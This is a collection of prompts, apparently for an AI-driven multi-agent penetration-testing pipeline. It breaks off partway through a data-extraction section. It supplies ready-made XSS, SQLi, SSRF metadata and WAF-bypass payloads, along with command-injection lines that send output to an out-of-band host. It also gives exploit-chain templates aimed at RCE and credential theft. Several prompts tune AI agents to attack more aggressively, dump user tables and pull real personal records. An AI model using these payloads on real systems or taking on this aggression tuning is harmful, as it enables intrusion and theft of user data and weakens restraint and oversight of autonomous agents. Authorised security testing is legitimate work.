🔴 CrewAgent — Offensive AI Prompt Collection

Project: Pentest Crew — Multi-agent offensive security pipeline
Stack: Python 3.10+, CrewAI, Burp Suite MCP, 30+ attack tool modules
Philosophy: Find the vuln. Prove it. Chain it. Report it.


📋 Table of Contents

  1. Master Offensive Context Prompt
  2. Vulnerability Discovery Prompt
  3. Payload Crafting & WAF Bypass Prompt
  4. Exploit Chain Building Prompt
  5. New Attack Module Creation Prompt
  6. Agent Aggression Tuning Prompt
  7. Bug Bounty Maximization Prompt
  8. Data Exfiltration & Impact Proof Prompt
  9. Coverage Gap & Missed Attack Surface Prompt
  10. Full Pipeline Offensive Audit Prompt

1. Master Offensive Context Prompt

Paste this as the opener of every session. It is the "briefing" for the AI before the operation begins.

You are a senior offensive security engineer and red team operator working on **Pentest Crew** — an autonomous multi-agent web application attack pipeline built on CrewAI + Burp Suite MCP.

Your job is not to detect vulnerabilities in theory. Your job is to FIND, PROVE, and CHAIN real exploits on authorized targets. Think like an attacker, operate like an engineer.

## What This Pipeline Does
Pentest Crew reads Burp Suite's live HTTP history, scope, and scanner state via MCP, then autonomously attacks the target through 8 specialist agents:

scope_discovery_agent   → enumerate hidden attack surface
http_analyst            → triage history, map high-value targets  
auth_agent              → extract sessions, test auth weaknesses
fuzzing_agent           → discover parameters, trigger anomalies
validation_executor     → ATTACK — exploit every candidate finding
lead_pentester          → score, verify, escalate confirmed findings
exploitation_agent      → post-exploitation: extract data, chain attacks
report_generator        → client-ready report with PoC scripts

## Offensive Philosophy (apply to every decision)
- **A finding without a PoC is just a theory.** Every confirmed finding needs a working request.
- **Always escalate impact.** An XSS becomes session hijack. An SSRF probes internal services. An IDOR extracts real data.
- **Chain everything.** SQLi + IDOR = full database dump. SSRF + CORS = credential theft. Don't stop at first blood.
- **The scanner is a starting point, not the answer.** Burp scanner misses logic flaws, chained attacks, and auth bypass.
- **Burp history is the treasure map.** Every endpoint with an `id=`, `token=`, `redirect=`, or JWT is a target.

## Tool Arsenal (118 total)
The `validation_executor` carries 105 attack tools covering:
- SQLi: error-based, blind, time-based, UNION, stacked queries, data extraction
- XSS: context detection, WAF bypass, DOM-based, stored via parameter pollution
- SSRF: basic, blind/OOB via Collaborator, metadata endpoints, protocol smuggling
- Auth: JWT none-alg, alg confusion, session fixation, OAuth state bypass, PKCE abuse
- Injection: command injection (blind + output extraction), XXE (OOB + billion laughs), LDAP
- Logic: race conditions, coupon bypass, mass assignment, OTP bypass, price tampering
- Access Control: Autorize session-swap (horizontal + vertical), multi-role escalation
- Advanced: request smuggling (CL.0, TE.TE, H2), prototype pollution, cache poisoning, CRLF

## Key Offensive Behaviors to Enforce
1. `validation_executor` must NEVER stop at one test case — exhaust all applicable payloads per finding
2. `exploitation_agent` runs ONLY on CONFIRMED findings — but when it runs, it extracts real data
3. `lead_pentester` must calculate CVSS 3.1 scores, not just label "High/Medium/Low"
4. `report_generator` must produce curl/Python PoC that a developer can run to reproduce instantly
5. False negatives are worse than false positives — when in doubt, try the payload

## Burp MCP Attack Surface Available
- `send_http1_request` / `send_http2_request` — replay with full mutation control
- `generate_collaborator_payload` + `poll_collaborator_with_wait` — OOB for blind vulns
- `autorize_check` / `autorize_multi_role_check` — horizontal + vertical privesc automation
- `send_to_intruder` — hand off to Burp Intruder for brute/fuzz campaigns
- `get_proxy_http_history_regex` — hunt specific patterns across all captured traffic
- `create_repeater_tab` — document attack sequences for PoC reproduction

When I ask you to work on this project, think OFFENSIVELY. The goal is maximum finding coverage with maximum impact proof.

2. Vulnerability Discovery Prompt

Use this to have the AI broaden attack-surface detection and surface findings the pipeline missed.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Find What the Pipeline Is Missing

The current pipeline runs 118 tools across 8 agents. Assume the target has been browsed and Burp history is populated. Your job is to identify what HIGH-VALUE vulnerabilities this pipeline might MISS and fix that gap.

### Attack Surface Audit — Answer These

**1. Hidden Parameters**
The current `fuzzing_agent` uses `param_discovery` and `param_fuzzer`. But:
- Does it fuzz hidden/undocumented API parameters beyond the wordlist?
- Does it attempt parameter pollution (HPP) — same param name multiple times?
- Does it fuzz JSON body keys, not just URL params?
- Does it test path segment parameters (e.g., `/api/v1/{user_id}/settings`)?

**2. Auth & Session Weaknesses**
The `auth_agent` extracts sessions and tests auto-login. But:
- Does it test for JWT `kid` header injection (SQL injection via kid parameter)?
- Does it test for JWT `jku`/`x5u` header hijacking (point to attacker-controlled JWK Set)?
- Does it detect tokens that don't expire (long-lived JWT, no `exp` claim)?
- Does it test session invalidation after logout (replay old session token after logout)?
- Does it test for account takeover via password reset token reuse?

**3. Business Logic**
No automated tool catches these — but `lead_pentester` and `validation_executor` should attempt:
- Negative quantity/price in cart/order endpoints
- Replay of single-use tokens (password reset, email verify, OTP)
- Concurrent requests to race-condition sensitive operations (funds transfer, coupon apply)
- Skipping multi-step flow steps (jump from step 1 to step 3, bypass step 2)
- Mass assignment on user profile update (try adding `role=admin`, `is_admin=true`)

**4. OOB/Blind Vulns That Need Collaborator**
These are high-severity but often missed without OOB infrastructure:
- Blind SSRF via `redirect=`, `webhook=`, `avatar_url=`, `import_url=`, `callback=` params
- Blind command injection via time-delay AND Collaborator DNS exfil
- Blind XXE via external DTD load
- DNS rebinding for CSRF to internal services

**5. Modern API Attack Surface**
- GraphQL: introspection → field-level auth bypass → batching bypass rate limits → IDOR via node IDs
- WebSocket: does the pipeline test auth on WS handshake? Injection via WS frames?
- gRPC / Protobuf endpoints: not covered — flag as NEEDS_ESCALATION
- Server-Sent Events (SSE) endpoints: are they in scope?

### Deliverables
For each gap you identify:
1. Which agent/tool should cover it
2. Exact code change needed (new tool or modified `_run()` logic)
3. Example payload or test case
4. What a CONFIRMED finding looks like (what response delta proves exploitation)

3. Payload Crafting & WAF Bypass Prompt

Use this to strengthen the payloads in each tool, especially for targets behind a WAF or input filtering.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Harden Attack Payloads Against Real-World Defenses

The current tools use basic payloads. Real targets have WAFs (Cloudflare, Akamai, AWS WAF, ModSecurity), input filtering, and encoding validation. Upgrade the payloads.

### Target File
[SPECIFY — e.g., `src/pentest_crew/tools/xss_bypass_tools.py` or `sql_injection_tools.py`]

### Current Payload Weaknesses to Fix

**XSS (xss_bypass_tools.py)**
Current tools test basic `<script>alert(1)</script>`. Real WAFs block this.
Upgrade to include:

# Context-aware bypass payloads — use based on reflection context:
HTML_CONTEXT = [
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<!--<img src=--><img src=x onerror=alert(1)>",
]
ATTR_CONTEXT = [
    '" onmouseover=alert(1) x="',
    "' onfocus=alert(1) autofocus='",
    '" autofocus onfocus=alert(1) "',
]
JS_CONTEXT = [
    "';alert(1)//",
    "\";alert(1)//",
    "\\';alert(1)//",
    "${alert(1)}",  # template literal
]
WAF_BYPASS = [
    "<scr\x00ipt>alert(1)</scr\x00ipt>",   # null byte
    "<svg/onload=alert(1)>",                 # no space
    "<svg\tonload=alert(1)>",                # tab
    "<sCrIpT>alert(1)</sCrIpT>",            # case variation
    "%3Cscript%3Ealert(1)%3C/script%3E",   # URL encoded
    "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",  # HTML entities
    "<script>eval(atob('YWxlcnQoMSk='))</script>",    # base64
]

**SQLi (sql_injection_tools.py)**
Upgrade beyond `' OR 1=1--` to include:
```python
SQLI_WAF_BYPASS = [
    "' /*!50000OR*/ '1'='1",          # MySQL version comment
    "' OR/**/1=1--",                   # inline comment
    "' OR 0x313d31--",                 # hex encoding
    "' OR 1=1;--",                     # semicolon variation
    "%27%20OR%201%3D1--",             # URL encoded
    "' OR 'x'='x",                    # no numbers
    "admin'--",                        # direct admin bypass
    "' OR 1=1 LIMIT 1--",             # MySQL specific
    "1; SELECT SLEEP(5)--",            # time-based
    "1 UNION SELECT NULL,NULL,NULL--", # UNION base
]

# DB fingerprinting payloads (run first to choose right UNION syntax):
DB_FINGERPRINT = {
    "mysql":    "' AND SLEEP(0)--",
    "postgres": "' AND pg_sleep(0)--",
    "mssql":    "' WAITFOR DELAY '0:0:0'--",
    "oracle":   "' AND 1=UTL_INADDR.GET_HOST_ADDRESS('test')--",
    "sqlite":   "' AND typeof(1)='integer'--",
}
```

**SSRF (ssrf_tools.py)**
Cloud metadata endpoints vary by provider. Add:
```python
SSRF_METADATA_TARGETS = [
    # AWS
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://[fd00:ec2::254]/latest/meta-data/",  # IPv6 variant
    # GCP
    "http://metadata.google.internal/computeMetadata/v1/",
    "http://169.254.169.254/computeMetadata/v1/",
    # Azure
    "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
    # DigitalOcean
    "http://169.254.169.254/metadata/v1/",
    # SSRF bypass techniques
    "http://0177.0.0.1/",              # Octal
    "http://0x7f000001/",              # Hex
    "http://2130706433/",              # Decimal
    "http://localhost:80@169.254.169.254/",  # URL auth bypass
    "http://169.254.169.254#@example.com/", # Fragment bypass
    "dict://169.254.169.254:80/",      # Protocol swap
    "gopher://169.254.169.254:80/_",   # Gopher
]
```

**Command Injection (command_injection_tools.py)**
Add OS-aware blind injection with Collaborator OOB:
```python
CMD_INJECTION_OOB = [
    # Linux (using collaborator_domain from generate_collaborator_payload)
    "`nslookup {collab}`",
    "$(nslookup {collab})",
    "| nslookup {collab}",
    "; curl http://{collab}/`whoami`",
    "& ping -c 1 {collab}",
    # Windows
    "| nslookup {collab}",
    "& nslookup {collab}",
    "; nslookup {collab}",
    "| curl http://{collab}/",
    # Encoded variants
    "`nl%73lookup {collab}`",           # URL encoded 's'
    "$(n\\slookup {collab})",           # backslash in command
]
```

### Output Requirements
1. Updated `_get_payloads()` or payload lists in the specified tool file
2. For each new payload, comment WHY it bypasses a specific defense
3. Detection logic update: what response delta proves the bypass payload worked?
4. Test cases: add mock responses that simulate WAF-bypassed vs WAF-blocked scenarios

4. Exploit Chain Building Prompt

Use this to maximize the impact of findings that are already confirmed: turn one bug into a full compromise.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Chain Confirmed Findings Into Maximum-Impact Exploits

Given these confirmed findings from the pipeline:
[PASTE CONFIRMED FINDINGS JSON OR DESCRIBE THEM]

Your job is to chain them into the highest-impact attack path possible.

### Chaining Logic Matrix

Apply this attack graph thinking to the findings:

| Initial Foothold | Next Step | Final Impact |
|---|---|---|
| SSRF (blind) | → probe internal services (Redis, Elasticsearch, IMDS) | → AWS credential theft, internal RCE |
| SSRF (read) | → internal admin panel access | → privilege escalation, config dump |
| SQLi (read) | → dump users table (hashed passwords) | → credential stuffing, account takeover |
| SQLi (write) | → write webshell via INTO OUTFILE | → RCE |
| XSS (stored) | → steal admin session cookie | → account takeover + admin panel access |
| XSS (reflected) | → CSRF to change admin email/password | → account takeover |
| IDOR | → access other users' PII/files | → mass data exfiltration |
| JWT alg confusion | → forge admin JWT | → full application takeover |
| Open Redirect | → phishing + OAuth token theft | → account takeover |
| CORS misconfiguration | → read authenticated API responses from attacker domain | → session data theft |
| Request Smuggling | → poison frontend cache | → reflected XSS to all users |
| Race Condition (payment) | → negative balance / free orders | → financial fraud |

### Chain Construction Task

For the findings provided:
1. **Map the attack graph**: Which findings can feed into others? Draw the dependency chain.
2. **Identify the kill chain**: What's the shortest path to highest impact (RCE, full account takeover, data exfil)?
3. **Implement chain in `exploit_chain_tools.py`**:
   - Each chain step should call the appropriate attack tool in sequence
   - Pass output of step N as input to step N+1
   - Stop chain on failure, record partial success
4. **Update `exploit_chain_correlator` logic** to automatically detect these chain patterns from the `confirmed_findings` list.
5. **Calculate combined CVSS**: A chain of Medium findings often = Critical impact. Calculate composite score.

### Output Requirements
```python
# Expected chain result structure:
{
    "chain_id": "CHAIN-001",
    "steps": [
        {"step": 1, "tool": "ssrf_basic_test", "result": "CONFIRMED", "evidence": {...}},
        {"step": 2, "tool": "ssrf_metadata_enum", "result": "CONFIRMED", "evidence": {"aws_keys": "..."}},
        {"step": 3, "tool": "ssrf_data_extraction", "result": "CONFIRMED", "evidence": {"iam_role": "..."}},
    ],
    "chain_verdict": "CRITICAL",
    "combined_cvss": "9.8",
    "attack_narrative": "SSRF at /api/import allows reading AWS IMDS → IAM credentials extracted → full AWS account compromise",
    "poc_script": "# Python PoC:\n..."
}
```

Implement the chain detection and execution logic end-to-end. Prioritize chains that reach RCE, full account takeover, or mass data exfiltration.
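
The sequencing rules from the Chain Construction Task (pass the output of step N into step N+1, stop on failure, keep partial success) can be sketched as a small runner. This is a minimal illustration, not the pipeline's actual `exploit_chain_tools.py`: the `StepFn` signature, `ChainResult`, and `run_chain` are hypothetical names, and each step is assumed to be a callable that returns a verdict string plus an evidence dict.

```python
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, List, Tuple

# Hypothetical step signature: receives the previous step's evidence and
# returns (verdict, evidence). The real tools may expose a different API.
StepFn = Callable[[Dict[str, Any]], Tuple[str, Dict[str, Any]]]


@dataclass
class ChainResult:
    chain_id: str
    steps: List[Dict[str, Any]] = field(default_factory=list)
    completed: bool = False


def run_chain(chain_id: str, steps: List[Tuple[str, StepFn]]) -> ChainResult:
    """Run steps in order, feeding each step's evidence into the next one."""
    result = ChainResult(chain_id=chain_id)
    evidence: Dict[str, Any] = {}
    for index, (tool_name, step) in enumerate(steps, start=1):
        verdict, evidence = step(evidence)
        result.steps.append(
            {"step": index, "tool": tool_name, "result": verdict, "evidence": evidence}
        )
        if verdict != "CONFIRMED":
            # Stop on failure; the steps recorded so far are the partial success.
            return result
    result.completed = True
    return result
```

Keeping the runner independent of any specific tool means the same loop can be exercised in unit tests with stub steps before real tools are wired in.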

5. New Attack Module Creation Prompt

Template for adding a new vulnerability class to the arsenal.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Build New Attack Module

### Vulnerability Class to Add
[SPECIFY — e.g., "OAuth 2.0 Misconfiguration", "Insecure Deserialization (Java/PHP)", "GraphQL Batching Rate Limit Bypass", "HTTP/2 Rapid Reset DoS", "WebAuthn Bypass"]

### Attack Module Requirements

**1. Coverage**: The module must test the full kill chain for this vuln class, not just detection:
   - Detection (does the vuln exist?)
   - Confirmation (can it be triggered reliably?)
   - Exploitation (what data/access can be gained?)

**2. Payload Design**:
   - Payloads must be targeted to the specific endpoint type (JSON API, form, header, etc.)
   - Include WAF bypass variants for each payload
   - OOB via Collaborator for blind variants (always generate payload BEFORE sending request)
   - Payloads bounded to max 10 per test run — no brute force loops

**3. File Structure**:
```python
"""
<vuln>_tools.py — <Vulnerability Class> attack module
Attack surface: <describe where this vuln lives>
Kill chain: <detection step> → <confirmation step> → <exploitation step>
"""
import os

from crewai.tools import BaseTool
from pentest_crew.tools.burp_mcp_client import get_client


class <Vuln>DetectTool(BaseTool):
    """Step 1: Detect if the vulnerability class exists at all."""
    name: str = "<vuln>_detect"
    description: str = "..."
    
    def _run(self, target_url: str, **kwargs) -> dict:
        # Fast detection — minimum requests, clear signal
        # Return CONFIRMED / NOT_CONFIRMED / INCONCLUSIVE
        ...


class <Vuln>ExploitTool(BaseTool):
    """Step 2: Exploit the confirmed vulnerability for maximum impact."""
    name: str = "<vuln>_exploit"
    description: str = "..."
    
    def _run(self, target_url: str, confirmed_param: str, **kwargs) -> dict:
        # Only called AFTER detection confirms the vuln
        # Extract real data / gain real access
        # Return proof of exploitation with actual data
        ...


class <Vuln>OOBTool(BaseTool):
    """Step 3: Blind/OOB variant using Burp Collaborator for non-reflected vulns."""
    name: str = "<vuln>_oob"
    description: str = "..."
    
    def _run(self, target_url: str, **kwargs) -> dict:
        client = get_client()
        # ALWAYS: generate collaborator payload FIRST
        collab = client.call_with_retry("generate_collaborator_payload", {})
        collab_domain = collab.get("payload", "")
        # Send attack with collab domain embedded
        ...
        # Poll for interactions AFTER sending
        interactions = client.call_with_retry("poll_collaborator_with_wait", {
            "payload": collab_domain,
            "wait_seconds": int(os.getenv("COLLABORATOR_WAIT_SECS", "30"))
        })
        return self._verdict(interactions)
```

**4. Registration** (required steps after creating the file):
```python
# In tools/__init__.py — add:
from pentest_crew.tools.<vuln>_tools import <Vuln>DetectTool, <Vuln>ExploitTool, <Vuln>OOBTool

vuln_detect = <Vuln>DetectTool()
vuln_exploit = <Vuln>ExploitTool()
vuln_oob = <Vuln>OOBTool()

# Add to EXECUTOR_TOOLS list
# Add to TOOL_CATEGORIES: "<vuln>": [vuln_detect, vuln_exploit, vuln_oob]
```

**5. agents.yaml update**: Add the new category to `validation_executor`'s backstory so it knows to use these tools when analyst finds relevant indicators.

**Deliver the complete attack module** with all three tool classes, registration, yaml update, and 3 test cases (confirmed, not confirmed, OOB hit).

6. Agent Aggression Tuning Prompt

Use this to make the agents more aggressive and exhaustive, so they do not stop at the first finding.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Tune Agents for Maximum Coverage and Aggression

Review `config/agents.yaml` and `config/tasks.yaml`. The current configuration is too conservative in these areas. Fix them.

### Problems to Fix in agents.yaml

**Problem 1: validation_executor stops too early**
Current backstory says "Execute max 5 targeted test cases." That's fine for quick wins, but for high-value endpoints (payment, admin, user management), 5 tests miss chained/encoded bypass variants.

Fix: Change the execution logic to:
```yaml
# For LOW-VALUE endpoints (search, display, info):
  - Execute max 5 test cases, stop on CONFIRMED
  
# For HIGH-VALUE endpoints (auth, payment, admin, file upload, URL fetch):
  - Execute FULL payload suite for applicable vuln classes
  - High-value signals: id= in params, /admin/, /payment/, /upload/, JWT in header,
    role= or user_id= in body, price= or amount= in body, url= or redirect= in body
  - Do NOT stop at first CONFIRMED — continue to test all applicable vuln classes
  - Log each test with verdict before moving to next
```
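
The low-value versus high-value split above could be decided by a small classifier over the request. The following is a rough sketch under stated assumptions: `is_high_value` and `case_budget` are hypothetical helpers, the regexes are simple heuristics for the signals listed in the YAML, and `None` is used here to mean "no cap, run the full suite".

```python
import re
from typing import Dict, Optional
from urllib.parse import urlsplit

PATH_SIGNALS = ("/admin/", "/payment/", "/upload/")
# id= or *_id= as a query parameter name (heuristic, misses names like "uid").
ID_PARAM_RE = re.compile(r"(^|&)(\w*_)?id=")
# Three dot-separated base64url segments starting with "eyJ" look like a JWT.
JWT_RE = re.compile(r"eyJ[\w-]+\.[\w-]+\.[\w-]*")
# Sensitive keys in a form-encoded or JSON body.
BODY_RE = re.compile(r'\b(?:role|user_id|price|amount|url|redirect)\b\s*[=:"]')


def is_high_value(url: str, headers: Dict[str, str], body: str) -> bool:
    """Return True when the request matches any high-value signal."""
    parts = urlsplit(url)
    if any(signal in parts.path for signal in PATH_SIGNALS):
        return True
    if ID_PARAM_RE.search(parts.query):
        return True
    if any(JWT_RE.search(value) for value in headers.values()):
        return True
    return bool(BODY_RE.search(body))


def case_budget(url: str, headers: Dict[str, str], body: str) -> Optional[int]:
    """Max test cases for this request: 5 for low-value, None for no cap."""
    return None if is_high_value(url, headers, body) else 5
```

A heuristic like this will misclassify some endpoints, so the matched signal is worth logging alongside each verdict.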

**Problem 2: exploitation_agent is too cautious**
Current backstory only does "post-confirmation data extraction" with minimal payloads.

Fix: Make it explicit that when a finding is CONFIRMED:
```yaml
# exploitation_agent must attempt:
- For SQLi: extract DB version, user(), database(), then enumerate tables, then dump users/credentials table
- For SSRF: probe 169.254.169.254 (AWS), metadata.google.internal (GCP), then internal network 10.x.x.x scan
- For IDOR: access 5 different object IDs (victim-1, victim+1, random IDs) to prove mass exposure
- For JWT forgery: forge admin-level token and access /admin, /api/admin, /dashboard
- For Command Injection: execute `id`, `whoami`, `hostname`, `cat /etc/passwd` (non-destructive)
- Stop only when: max_extraction_steps=10 reached, OR connection drops, OR server returns 429
```

**Problem 3: lead_pentester doesn't calculate CVSS properly**
Fix tasks.yaml `qa_review_task`:
```yaml
# Required for every CONFIRMED finding:
- Calculate CVSS 3.1 base score with explicit vector string
  Format: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
- Map Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, CIA impact
- Never just say "High" — always include vector string and numeric score
- For chains: calculate the COMBINED score (the chain that reaches most impact)
```
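
To make the numeric-score requirement concrete, here is a minimal sketch of the CVSS 3.1 base score computation from a vector string. The weights and the round-up rule follow the published CVSS v3.1 specification; the function names `roundup` and `cvss31_base_score` are illustrative, and the sketch handles base metrics only (no temporal or environmental metrics, no input validation beyond the prefix).

```python
import math

# Metric weights from the CVSS v3.1 specification.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required depends on whether Scope is Unchanged (U) or Changed (C).
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def cvss31_base_score(vector: str) -> float:
    """Compute the base score for a vector such as CVSS:3.1/AV:N/AC:L/..."""
    prefix, *pairs = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError(f"unsupported vector prefix: {prefix!r}")
    m = dict(pair.split(":", 1) for pair in pairs)
    scope = m["S"]
    cia = WEIGHTS["CIA"]
    iss = 1 - (1 - cia[m["C"]]) * (1 - cia[m["I"]]) * (1 - cia[m["A"]])
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = (
        8.22
        * WEIGHTS["AV"][m["AV"]]
        * WEIGHTS["AC"][m["AC"]]
        * PR_WEIGHTS[scope][m["PR"]]
        * WEIGHTS["UI"][m["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if scope == "C":
        total *= 1.08
    return roundup(min(total, 10.0))
```

For the example vector in the format line, `cvss31_base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N")` returns 9.1. Note that the specification defines no formula for a "combined" chain score, so any composite value for a chain is a reporting convention rather than a CVSS output.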

**Problem 4: scope_discovery_agent is passive**
Fix: Make it actively enumerate beyond robots.txt/sitemap. Add to backstory:
```yaml
# scope_discovery_agent must ALSO attempt:
- Enumerate /api/v1/, /api/v2/, /v1/, /v2/ path variations
- Try /.git/config, /.env, /backup.zip, /config.yml for exposed secrets
- Fetch all JS files and extract: hardcoded URLs, API keys, internal endpoints, S3 bucket names
- Test all found subdomains for same-origin vulnerabilities
- Look for admin panels: /admin, /administrator, /wp-admin, /manager, /console
- Identify technology stack (WAF type, server, framework) for targeted attack planning
```

### Deliverables
1. Updated `config/agents.yaml` — rewrite backstory sections for the 4 agents above
2. Updated `config/tasks.yaml` — tighten expected_output to require CVSS vector strings
3. Explain how each change increases finding yield or impact depth

7. Bug Bounty Maximization Prompt

Specifically for the bug bounty context: maximize the P1/Critical finding rate.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Tune Pipeline for Maximum Bug Bounty Payout

Bug bounty programs pay based on severity and impact. Tune the pipeline to find P1/Critical findings that justify maximum payouts.

### High-Payout Target Patterns — Add These to http_analyst Triage

The `http_analyst` must prioritize these endpoint signatures as HIGH PRIORITY candidates:

```python
# P1 / Critical signal patterns — always escalate to full validation
CRITICAL_SIGNALS = {
    "account_takeover": [
        r"password[-_]?reset", r"forgot[-_]?password", r"change[-_]?email",
        r"verify[-_]?token", r"confirm[-_]?token", r"activate[-_]?account",
        r"oauth.*callback", r"auth.*code=", r"access_token=",
    ],
    "idor_high_value": [
        r"user[_-]?id=\d+", r"account[_-]?id=\d+", r"uid=\d+",
        r"invoice[_-]?id=\d+", r"order[_-]?id=\d+", r"payment[_-]?id=\d+",
        r"document[_-]?id=\d+", r"file[_-]?id=\d+", r"report[_-]?id=\d+",
    ],
    "rce_surface": [
        r"exec=", r"command=", r"cmd=", r"system=", r"run=",
        r"import.*url=", r"webhook=", r"callback=", r"ping=",
        r"template=", r"render=", r"pdf.*url=", r"screenshot.*url=",
    ],
    "privilege_escalation": [
        r"/admin/", r"/superuser/", r"/internal/", r"/staff/",
        r"role=", r"is_admin=", r"privilege=", r"permission=",
        r"sudo=", r"elevated=",
    ],
    "mass_data_exfil": [
        r"/export", r"/download", r"/bulk", r"/report",
        r"format=csv", r"format=xlsx", r"limit=\d{4,}", # large limit values
    ]
}
```
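
A signal table like this only helps once something applies it to captured traffic. The sketch below shows one possible way to match a request against the patterns; `classify_request` is a hypothetical helper, and `SIGNALS` is a small subset copied from the table above to keep the example self-contained.

```python
import re
from typing import Dict, List

# Illustrative subset of the signal table, not the full list.
SIGNALS: Dict[str, List[str]] = {
    "account_takeover": [r"password[-_]?reset", r"forgot[-_]?password"],
    "idor_high_value": [r"user[_-]?id=\d+", r"order[_-]?id=\d+"],
    "privilege_escalation": [r"/admin/", r"role="],
}

# Compile once so repeated triage over a large history stays cheap.
COMPILED = {
    category: [re.compile(pattern, re.IGNORECASE) for pattern in patterns]
    for category, patterns in SIGNALS.items()
}


def classify_request(url: str, body: str = "") -> List[str]:
    """Return every signal category whose patterns match the URL or body."""
    haystack = f"{url}\n{body}"
    return [
        category
        for category, patterns in COMPILED.items()
        if any(pattern.search(haystack) for pattern in patterns)
    ]
```

Returning all matching categories, rather than the first hit, lets the analyst see when one endpoint carries several signals at once.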

### Scoring for Bug Bounty Triage

Add a payout-potential score to each finding candidate:
```python
BOUNTY_SCORE = {
    "rce":                   10,  # Almost always P1 ($10k-$30k+)
    "account_takeover":       9,  # P1 ($5k-$20k)
    "sqli_with_exfil":        9,  # P1 if PII/credentials exposed
    "auth_bypass_to_admin":   9,  # P1
    "ssrf_internal":          8,  # P1 on cloud-hosted apps
    "idor_mass_exposure":     8,  # P1 if PII at scale
    "jwt_admin_forge":        8,  # P1
    "stored_xss_admin":       7,  # P2 ($1k-$5k)
    "request_smuggling":      7,  # P2 on well-known programs
    "open_redirect_oauth":    6,  # P2 when combined with OAuth
    "reflected_xss":          5,  # P3 ($200-$1k)
    "idor_single":            5,  # P3 unless sensitive data
    "cors_with_credentials":  5,  # P3 
    "info_disclosure":        3,  # P4 / Informational
}
```
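
One simple use of this table is ordering the candidate queue. As a sketch, assuming each candidate is a dict with a `class` key that matches a table entry (a hypothetical shape, as is the `rank_candidates` helper), unknown classes fall to the bottom with a score of 0:

```python
from typing import Any, Dict, List

# Illustrative subset of the scoring table above.
BOUNTY_SCORE = {
    "rce": 10,
    "account_takeover": 9,
    "reflected_xss": 5,
    "info_disclosure": 3,
}


def rank_candidates(candidates: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Sort candidates by payout potential, highest first (stable for ties)."""
    return sorted(
        candidates,
        key=lambda candidate: BOUNTY_SCORE.get(candidate["class"], 0),
        reverse=True,
    )
```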

### Auto-Escalation Rules

Add to `lead_pentester` QA review logic:

IF finding is IDOR AND affected_data contains [PII | credentials | payment_info]:
    → escalate to P1, require exploitation_agent to extract 5 real records as proof

IF finding is XSS AND injection_point is [stored | admin_panel | email_template]:
    → escalate from P3 to P1, require session hijack PoC

IF finding is SSRF AND server is [AWS | GCP | Azure]:
    → require metadata endpoint probe as next step (169.254.169.254 or equivalent)

IF finding is SQLi AND db_type is [MySQL | PostgreSQL]:
    → require dump of users/accounts table (first 3 rows, redacted) as impact proof

IF finding is Open_Redirect AND OAuth_flow_detected:
    → test redirect_uri hijacking for token theft, escalate to P1 if successful

### PoC Quality Standards

The `report_generator` must produce PoC that meets HackerOne/Bugcrowd submission standards:
```markdown
## Proof of Concept

**Step 1**: Log in as a regular user (test@example.com / password123)

**Step 2**: Send the following request (curl):

curl -X POST 'https://target.com/api/user/profile' \
  -H 'Authorization: Bearer <your_session_token>' \
  -H 'Content-Type: application/json' \
  -d '{"user_id": 1337, "action": "view"}'

**Step 3**: Observe that the response returns user data for user_id 1337 (admin), 
not the authenticated user. This confirms broken object-level authorization.

**Expected Response** (vulnerable):
```json
{"user_id": 1337, "email": "admin@target.com", "role": "admin"}
```

**Impact**: An attacker can enumerate all user accounts and access their PII 
by incrementing user_id. Estimated exposed records: ~50,000 users.

Implement all of the above as concrete code changes to `http_analyst` triage logic, `lead_pentester` escalation rules, and `report_generator` PoC template.

8. Data Exfiltration & Impact Proof Prompt

Use this to make sure the exploitation_agent actually extracts data as proof of impact.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Maximize Impact Proof via Data Extraction

The `exploitation_agent` must prove impact with REAL data, not theoretical descriptions. Review and upgrade `exploitation_tools.py`.

### What Counts as Proof (by vuln class)

**SQLi Proof Standard**:
```python
# NOT sufficient: "SQLi confirmed via error message"
# REQUIRED:
{
    "vuln": "SQL Injection",
    "db_version": "MySQL 8.0.32",
    "db_user": "webapp@localhost", 
    "db_name": "production_db",
    "tables_found": ["users", "orders", "payment_methods"],
    "sample_data": {
        "users_table_row_count": 47832,
        "sample_email": "re***@example.com",  # redacted but proves access
        "has_password_hashes": True,
        "has_pii": True
    },
    "extraction_query": "SELECT version(), user(), database()",
    "cvss": "9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
```

**IDOR Proof Standard**:
```python
# Test at least 3 object IDs: victim_id-1, victim_id+1, random ID
# Required proof:
{
    "vuln": "IDOR - Broken Object Level Authorization",
    "tested_ids": [1001, 1002, 1003, 9999],
